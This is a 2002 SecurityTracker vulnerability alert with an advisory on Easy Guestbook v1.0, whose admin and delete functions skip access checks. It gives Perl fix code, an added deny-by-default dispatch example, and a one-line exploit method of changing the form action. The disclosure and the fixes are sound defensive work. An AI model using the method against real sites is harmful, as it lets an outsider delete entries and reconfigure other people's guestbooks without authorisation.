SecurityTracker.com
Category:  Application (Generic)  >  Easy Guestbook
Vendors:  Easy Scripts Archive
Easy Guestbook CGI Script Access Validation Flaw Gives Remote Users Administrative Access
SecurityTracker Alert ID:  1004864
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Jul 28 2002
Impact:  Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:  A vulnerability was reported in the Easy Guestbook CGI script. A remote user can gain administrative privileges in the Guestbook application.

According to the report, several functions fail to perform access validation. A remote user can log in with administrator privileges, change the configuration, and delete guest book entries.

A demonstration exploit is provided in the Source Message (it is a Base64-encoded zip file).

The vendor has reportedly been notified.

Impact:  A remote user can gain administrative access to the application.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.easyscripts.co.uk/guestbook_index.htm
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Arek Suroboyo <ar3su@yahoo.com>
Message History:   None.


 Source Message Contents

Date:  Sat, 27 Jul 2002 12:58:55 -0700 (PDT)
From:  Arek Suroboyo <ar3su@yahoo.com>
Subject:  Easy Guestbook Vulnerabilities

 


AresU Advisory 
19/July/2002 

Easy Guestbook Vulnerabilities 

Severity        : High (Possible to edit member homepage)
Systems Affected: Easy Guestbook v1.0
Vendor URL      : http://www.easyscripts.co.uk
Vuln Type       : It does not use Access Validation to delete the entries and log in as Admin Control.
Author          : AresU
Greetz to       : Bosen, Tioeuy, eF73, SakitJiwa, nimdA, Br0374l, FreshFirst, Algorithm, Mr.Padang
Adv.URL         : http://bosen.net/advisories/aresu-adv.002.txt

Summary 
======= 
1) Everyone can delete the entries and log in as Admin Control.
2) Everyone can reconfigure Guestbook when they open config.cgi and change Admin Password.

Solution 
======== 
1) Add Access Validation on "delete_message" function and "start" function.

   Add admin.cgi with this code:
   sub login_verify
   {
        # Strip trailing newlines from the submitted credentials
        chomp($FORM{'login_username'});
        chomp($FORM{'login_password'});
        # Stop unless both values match the configured admin account
        if (!($FORM{'login_username'} eq $username && $FORM{'login_password'} eq $password))
        {
          dienice("Sorry, but you have entered an invalid username or password.  Please press the 'back' button on your browser to return to the Login Screen.");
        }
   }

   And on the first line of "delete_message" function and "start" function add this:
   &login_verify;

   And on the "start" function add this code in the <FORM>:
   <input type="hidden" name="login_username" value="$FORM{'login_username'}">
   <input type="hidden" name="login_password" value="$FORM{'login_password'}">

2) Delete config.cgi after you finish configuring the Guestbook.


Acknowledgments 
=============== 
Vulnerability discovery, exploit code, and advisory by AresU

Vendor Response 
=============== 
Vendor has been contacted for about 10 days but they still haven't fixed it yet.

Exploit Code 
============ 
Change action in the html form.


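The access validation the advisory asks for, shown as an added example (not code from the advisory or from Easy Guestbook): rather than relying on a check being called inside each function, one dispatch table marks which actions need admin rights and refuses anything unlisted. The action names follow the advisory; the handler bodies, credentials, the `secure_eq` and `dispatch` helpers and the request hashes are constructed assumptions, and the form is assumed to be already parsed into a hash.

```perl
#!/usr/bin/perl
# Added example: deny-by-default dispatch for a guestbook admin CGI.
use strict;
use warnings;

my %CONFIG = (username => 'admin', password => 'constructed-secret');  # constructed

# Compare two strings without stopping at the first differing character.
sub secure_eq {
    my ($x, $y) = @_;
    return 0 unless defined($x) && defined($y) && length($x) == length($y);
    my $diff = 0;
    $diff |= ord(substr($x, $_, 1)) ^ ord(substr($y, $_, 1)) for 0 .. length($x) - 1;
    return $diff == 0;
}

sub authenticated {
    my ($form) = @_;
    return secure_eq($form->{login_username}, $CONFIG{username})
        && secure_eq($form->{login_password}, $CONFIG{password});
}

# Every action is listed with its handler and whether it needs admin rights.
# Anything not listed is refused, so a handler cannot be reached unchecked.
my %ACTIONS = (
    view           => { admin => 0, run => sub { "entries listed" } },
    start          => { admin => 1, run => sub { "admin panel shown" } },
    delete_message => { admin => 1, run => sub { "entry " . $_[0]{id} . " deleted" } },
);

sub dispatch {
    my ($form) = @_;
    my $action = $ACTIONS{ $form->{action} // '' }
        or return "403 unknown action";
    return "403 login required" if $action->{admin} && !authenticated($form);
    return $action->{run}->($form);
}

# Constructed requests: the second asks for delete_message with no
# credentials, the last names an action that is not in the table.
my @requests = (
    { action => 'view' },
    { action => 'delete_message', id => 3 },
    { action => 'delete_message', id => 3,
      login_username => 'admin', login_password => 'constructed-secret' },
    { action => 'config' },
);
printf "%-16s => %s\n", $_->{action}, dispatch($_) for @requests;
```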


Copyright 2002, SecurityGlobal.net LLC